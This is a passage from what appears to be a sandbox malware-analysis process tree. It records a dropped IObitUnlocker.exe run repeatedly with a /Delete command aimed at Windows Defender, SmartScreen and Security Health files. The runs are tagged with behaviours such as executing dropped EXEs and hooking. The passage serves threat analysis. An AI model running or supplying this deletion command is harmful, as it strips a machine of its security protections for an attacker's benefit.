Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5644
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2452
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2112
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2360
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5160
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:248
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2936
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:948
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4240
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5708
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5412
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
